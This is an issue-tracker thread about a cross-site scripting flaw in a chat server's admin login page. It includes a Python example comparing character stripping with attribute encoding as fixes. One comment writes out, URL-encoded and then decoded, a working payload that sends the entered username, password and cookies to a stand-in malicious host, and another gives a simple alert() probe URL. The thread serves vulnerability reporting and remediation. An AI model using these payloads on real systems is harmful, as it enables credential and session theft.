Cross-site scripting attack in the login form

Description

As reported by a community member, there is a cross-site scripting vulnerability in the login page of the admin console. Although it's unlikely to be exploited, it's important to get fixed.

Environment

None


Activity


Yehuda Katz April 19, 2010 at 6:09 AM

I am not sure the correct solution is to just strip these characters.
My understanding is that some of the characters that function strips could be valid username characters and, while the likelihood of someone using them is low, I would hate to see functionality in the program arbitrarily broken to fix this bug.

I would contribute a fix, but I am having some trouble getting Eclipse to work, and that is my editor of choice.

Guus der Kinderen January 11, 2010 at 3:44 AM

Fixed the XSS on the login screen.

Daryl Herzmann June 26, 2009 at 10:44 PM

reopening.

davesan June 26, 2009 at 9:43 PM

I looked around, but I didn't see anything more on this. It appears to be marked "fixed", but the admin console, as of version 3.6.4, is still vulnerable to XSS.

e.g.,
http://../openfire/login.jsp?url=%2Findex.jsp&login=&username=%22%20onclick=%22alert(%27xss%27)&password=

Juan C Calderon January 18, 2006 at 5:15 AM

Hello guys

I'm afraid this issue was not completely fixed. The problem still exists for the "url" parameter, and the fix implementation for the "username" parameter has failed, since an XSS attack without the less-than character,
like the following, is still working. The following attack implements a small function to steal admin credentials and send them to a (fictitious) malicious site; it is fully functional:
http://JiveServer:9090/login.jsp?username=%22+onchange%3D%27document.loginForm.onsubmit%3Drobit%3Bfunction+robit%28%29+%7Bvar+image%3Bimage+%3D+new+Image%28%29%3Bimage.src+%3D+%22http%3A%2F%2Fwww.malicioussite.com%2FGet.asp%3FUsuario%3D%22+%2B+loginForm.username.value+%2B+%22%26Password%3D%22+%2B+loginForm.password.value+%2B+%22%26cookies%3D%22+%2B+document.cookie%7D%27+me%3D%22

URL decoded
http://JiveServer:9090/login.jsp?username=" onchange='document.loginForm.onsubmit=robit;function robit() {var image;image = new Image();image.src = "http://www.malicioussite.com/Get.asp?Usuario=" + loginForm.username.value + "&Password=" + loginForm.password.value + "&cookies=" + document.cookie}' me="

Please check the following resource for more information of different possible attacks.
http://ha.ckers.org/xss.html

Regards,
JC
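Added example (not Openfire's own code) illustrating the two points raised in this thread: a fix that only strips angle brackets does not hold for a value reflected inside an HTML attribute, while context-aware attribute encoding both closes the hole and keeps legitimate usernames intact. The input template, the probe string and the function names are constructed assumptions, not taken from login.jsp.

```python
import html
import re
from html.parser import HTMLParser

# Constructed probe with the shape discussed in the thread: it contains no '<' at all,
# it only needs a double quote to break out of value="..." and add a new attribute.
PROBE = '" onclick="alert(1)'


def strip_angle_brackets(value: str) -> str:
    """Character-stripping approach: removes '<' and '>' only (insufficient in attribute context)."""
    return re.sub(r"[<>]", "", value)


def attr_encode(value: str) -> str:
    """Context-aware output encoding for an HTML attribute value: & < > \" and ' become entities."""
    return html.escape(value, quote=True)


def render_username_field(username: str, encoder) -> str:
    """Hypothetical template standing in for how a login page reflects the username parameter."""
    return '<input type="text" name="username" value="%s">' % encoder(username)


class _AttrCollector(HTMLParser):
    """Collects the attributes of the <input> tag as an HTML parser actually sees them."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)  # entity references in values are already decoded here


def parsed_attributes(markup: str) -> dict:
    """Return the attributes the rendered tag ends up with after parsing."""
    collector = _AttrCollector()
    collector.feed(markup)
    return collector.attrs


def injected_handlers(markup: str) -> list:
    """Names of any on* event-handler attributes the reflected value managed to introduce."""
    return sorted(k for k in parsed_attributes(markup) if k.startswith("on"))


if __name__ == "__main__":
    for label, enc in (("strip <>", strip_angle_brackets), ("attr-encode", attr_encode)):
        out = render_username_field(PROBE, enc)
        print(f"{label:12s} handlers={injected_handlers(out)} value={parsed_attributes(out).get('value')!r}")
```

Running the script shows the stripped variant still yields an `onclick` attribute, while the encoded variant yields none and round-trips the original string (including apostrophes in names such as O'Brien) as the field's value.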

Fixed

Details

Created October 11, 2005 at 12:59 AM
Updated April 19, 2010 at 6:09 AM
Resolved January 11, 2010 at 3:44 AM
